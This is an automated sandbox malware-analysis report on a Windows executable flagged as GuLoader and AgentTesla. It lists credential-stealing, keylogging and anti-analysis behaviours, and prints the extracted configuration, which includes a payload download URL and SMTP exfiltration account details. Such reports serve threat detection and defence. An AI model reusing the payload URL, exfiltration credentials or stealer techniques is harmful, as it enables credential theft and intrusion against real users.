Loading ...

Play interactive tourEdit tour

Windows Analysis Report pago12_14299038859.exe

Overview

General Information

Sample Name:pago12_14299038859.exe
Analysis ID:539535
MD5:9a1518ed709f916360e56b5ac7d76995
SHA1:7c85312d66edf5b02ebd6c25cfe9c036a3471263
SHA256:2a0878c196278384aab473c92977d236680c788b4e5ae0cc1f415a075a6fa9e2
Infos:

Most interesting Screenshot:

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to register a low level keyboard hook
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • pago12_14299038859.exe (PID: 5804 cmdline: "C:\Users\user\Desktop\pago12_14299038859.exe" MD5: 9A1518ED709F916360E56B5AC7D76995)
    • CasPol.exe (PID: 5004 cmdline: "C:\Users\user\Desktop\pago12_14299038859.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "bin2laden@yandex.combombom222smtp.yandex.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000000.12525032302.0000000001300000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000001.00000002.12762384265.0000000002AF0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: CasPol.exe PID: 5004JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0000000B.00000000.12525032302.0000000001300000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/"}
            Source: conhost.exe.400.12.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "bin2laden@yandex.combombom222smtp.yandex.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: pago12_14299038859.exeReversingLabs: Detection: 15%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A12C6C CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A133C0 CryptUnprotectData,
            Source: pago12_14299038859.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.11.20:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49798 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5o/
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hned2vkl7hruln90p34il302vgb/1639487400000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-0o-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49803 -> 77.88.21.158:587
            Source: global trafficTCP traffic: 192.168.11.20:49803 -> 77.88.21.158:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 0000000B.00000002.17079278273.000000001E414000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 0000000B.00000002.17079278273.000000001E414000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080004153.000000001E4A8000.00000004.00000001.sdmpString found in binary or memory: http://MXR45a7j4Fjsxd.org
            Source: CasPol.exe, 0000000B.00000002.17079278273.000000001E414000.00000004.00000001.sdmpString found in binary or memory: http://MXR45a7j4Fjsxd.orgt-
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/ca.crl0h
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://crl.certum.pl/ctnca.crl0k
            Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068255801.00000000016D6000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068255801.00000000016D6000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://crls.yandex.net/certum/ycasha2.crl0-
            Source: CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmpString found in binary or memory: http://repository.cer
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ca.cer09
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ctnca.cer09
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://repository.certum.pl/ycasha2.cer0
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmpString found in binary or memory: http://smtp.yandex.com
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certum.com0.
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://subca.ocsp-certum.com01
            Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpString found in binary or memory: http://uYFyNj.com
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086703095.0000000020664000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://www.certum.pl/CPS0
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://yandex.crl.certum.pl/ycasha2.crl0q
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: http://yandex.ocsp-responder.com03
            Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%4
            Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
            Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068150590.00000000016C8000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/
            Source: CasPol.exe, 0000000B.00000003.12729883223.00000000016EC000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/a
            Source: CasPol.exe, 0000000B.00000003.12729812870.00000000016E6000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17068150590.00000000016C8000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hne
            Source: CasPol.exe, 0000000B.00000003.12738588977.00000000016E6000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-0o-docs.googleusercontent.com/tography
            Source: CasPol.exe, 0000000B.00000002.17067847597.0000000001697000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 0000000B.00000002.17067847597.0000000001697000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/g(
            Source: CasPol.exe, 0000000B.00000002.17067974975.00000000016AB000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB
            Source: CasPol.exe, 0000000B.00000003.12729812870.00000000016E6000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB2E7rmT0-hM4sya-aE
            Source: CasPol.exe, 0000000B.00000002.17078787168.000000001E3B3000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080134727.000000001E4B9000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080134727.000000001E4B9000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080134727.000000001E4B9000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17080134727.000000001E4B9000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: CasPol.exe, 0000000B.00000002.17078787168.000000001E3B3000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: CasPol.exe, 0000000B.00000002.17079839935.000000001E483000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17087046057.000000002069C000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17089168443.0000000021600000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.17086371337.000000002062F000.00000004.00000001.sdmpString found in binary or memory: https://www.certum.pl/CPS0
            Source: CasPol.exe, 0000000B.00000002.17078384160.000000001E361000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/8g7b3hned2vkl7hruln90p34il302vgb/1639487400000/08820895400503972853/*/1rvzmbX5uh5tlf4YLxhmc756C1SkQ0vOB?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-0o-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.11.20:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.11.20:49798 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Installs a global keyboard hookShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
            Contains functionality to register a low level keyboard hookShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A1D7C0 SetWindowsHookExW 0000000D,00000000,?,?
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: pago12_14299038859.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_02AF02AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_012092D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01203E38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01244508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0124E9B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01243C38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_012438F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_015F78D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_015FCC8F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_015FB170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_015F9D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_015F366E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_019CB148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_019C67C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_019C4B08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_019C2740
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_019C2B78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_019C0040
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A14880
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A15B78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A18298
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A1AA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A1CD88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A10438
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A10448
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_01A13FF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_1E1D5D08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_1E1D4394
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_1E1D69F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_019C8370
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 01248BA8 appears 52 times
            Source: C:\Users\user\Desktop\pago12_14299038859.exeProcess Stats: CPU usage > 98%
            Source: pago12_14299038859.exe, 00000001.00000000.12022630539.000000000042B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFort.exe vs pago12_14299038859.exe
            Source: pago12_14299038859.exe, 00000001.00000002.12762339982.00000000029E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFort.exeFE2X vs pago12_14299038859.exe
            Source: pago12_14299038859.exeBinary or memory string: OriginalFilenameFort.exe vs pago12_14299038859.exe
            Source: pago12_14299038859.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\pago12_14299038859.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: pago12_14299038859.exeReversingLabs: Detection: 15%
            Source: pago12_14299038859.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\pago12_14299038859.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\pago12_14299038859.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\pago12_14299038859.exe "C:\Users\user\Desktop\pago12_14299038859.exe"
            Source: C:\Users\user\Desktop\pago12_14299038859.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago12_14299038859.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\pago12_14299038859.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\pago12_14299038859.exe"
            Source: C:\Users\user\Desktop\pago12_14299038859.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\pago12_14299038859.exeFile created: C:\Users\user\AppData\Local\Temp\~DFBA7BE0F4B3918979.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/2@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:400:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 0000000B.00000000.12525032302.0000000001300000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.12762384265.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_00406471 push edi; iretd
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_00409011 push esp; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_0040682F push esi; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_0040A490 push ds; iretd
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_004079F6 push eax; retf
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_004055BF push ds; ret
            Source: C:\Users\user\Desktop\pago12_14299038859.exeCode function: 1_2_00405ECC push ebp; ret
